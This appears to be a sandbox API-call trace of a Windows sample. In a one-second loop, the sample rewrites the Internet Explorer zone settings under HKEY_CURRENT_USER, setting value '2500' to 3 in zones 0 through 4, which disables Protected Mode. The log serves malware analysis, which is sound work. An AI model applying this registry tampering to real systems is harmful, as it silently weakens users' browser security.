	[0119.709] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0119.709] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.709] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.709] RegCloseKey (hKey=0x698) returned 0x0
	[0119.709] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0119.709] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.709] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.709] RegCloseKey (hKey=0x698) returned 0x0
	[0119.709] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0119.709] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.709] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.709] RegCloseKey (hKey=0x698) returned 0x0
	[0119.709] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0119.709] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.709] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.710] RegCloseKey (hKey=0x698) returned 0x0
	[0119.710] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0119.710] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.710] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.710] RegCloseKey (hKey=0x698) returned 0x0
	[0119.710] Sleep (dwMilliseconds=0x3e8) 
	[0119.711] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0119.711] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.711] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.711] RegCloseKey (hKey=0x698) returned 0x0
	[0119.711] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0119.711] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.711] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.711] RegCloseKey (hKey=0x698) returned 0x0
	[0119.711] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0119.712] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.712] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.712] RegCloseKey (hKey=0x698) returned 0x0
	[0119.712] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0119.712] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.712] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.712] RegCloseKey (hKey=0x698) returned 0x0
	[0119.712] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0119.712] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.712] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.712] RegCloseKey (hKey=0x698) returned 0x0
	[0119.712] Sleep (dwMilliseconds=0x3e8) 
	[0119.735] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0119.735] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.736] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.736] RegCloseKey (hKey=0x698) returned 0x0
	[0119.736] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0119.736] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.736] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.736] RegCloseKey (hKey=0x698) returned 0x0
	[0119.736] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0119.736] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.736] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.736] RegCloseKey (hKey=0x698) returned 0x0
	[0119.736] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0119.736] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.736] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.736] RegCloseKey (hKey=0x698) returned 0x0
	[0119.736] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0119.736] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.736] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.737] RegCloseKey (hKey=0x698) returned 0x0
	[0119.737] Sleep (dwMilliseconds=0x3e8) 
	[0119.739] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0119.739] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.739] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.739] RegCloseKey (hKey=0x698) returned 0x0
	[0119.739] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0119.739] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.739] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.739] RegCloseKey (hKey=0x698) returned 0x0
	[0119.739] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0119.739] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.739] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.739] RegCloseKey (hKey=0x698) returned 0x0
	[0119.739] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0119.739] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.739] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.739] RegCloseKey (hKey=0x698) returned 0x0
	[0119.739] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0119.739] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.740] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.740] RegCloseKey (hKey=0x698) returned 0x0
	[0119.740] Sleep (dwMilliseconds=0x3e8) 
	[0119.741] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0119.741] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.741] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.741] RegCloseKey (hKey=0x698) returned 0x0
	[0119.741] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0119.741] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.741] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.741] RegCloseKey (hKey=0x698) returned 0x0
	[0119.742] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0119.742] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.742] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.742] RegCloseKey (hKey=0x698) returned 0x0
	[0119.742] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0119.742] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.742] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.742] RegCloseKey (hKey=0x698) returned 0x0
	[0119.742] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0119.742] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.742] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.742] RegCloseKey (hKey=0x698) returned 0x0
	[0119.742] Sleep (dwMilliseconds=0x3e8) 
	[0119.744] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0119.744] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.744] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.744] RegCloseKey (hKey=0x698) returned 0x0
	[0119.744] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0119.744] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.744] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.744] RegCloseKey (hKey=0x698) returned 0x0
	[0119.744] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0119.744] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.744] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.744] RegCloseKey (hKey=0x698) returned 0x0
	[0119.744] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0119.744] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.744] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.745] RegCloseKey (hKey=0x698) returned 0x0
	[0119.745] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0119.745] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.745] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.748] RegCloseKey (hKey=0x698) returned 0x0
	[0119.748] Sleep (dwMilliseconds=0x3e8) 
	[0119.750] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0119.750] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.750] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.750] RegCloseKey (hKey=0x698) returned 0x0
	[0119.750] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0119.750] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.750] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.750] RegCloseKey (hKey=0x698) returned 0x0
	[0119.750] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0119.750] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.750] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.750] RegCloseKey (hKey=0x698) returned 0x0
	[0119.750] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0119.750] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.750] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.750] RegCloseKey (hKey=0x698) returned 0x0
	[0119.750] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0119.750] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.751] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.751] RegCloseKey (hKey=0x698) returned 0x0
	[0119.751] Sleep (dwMilliseconds=0x3e8) 
	[0119.752] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0119.752] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.752] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.752] RegCloseKey (hKey=0x698) returned 0x0
	[0119.752] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0119.755] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.755] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.756] RegCloseKey (hKey=0x698) returned 0x0
	[0119.756] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0119.756] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.756] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.756] RegCloseKey (hKey=0x698) returned 0x0
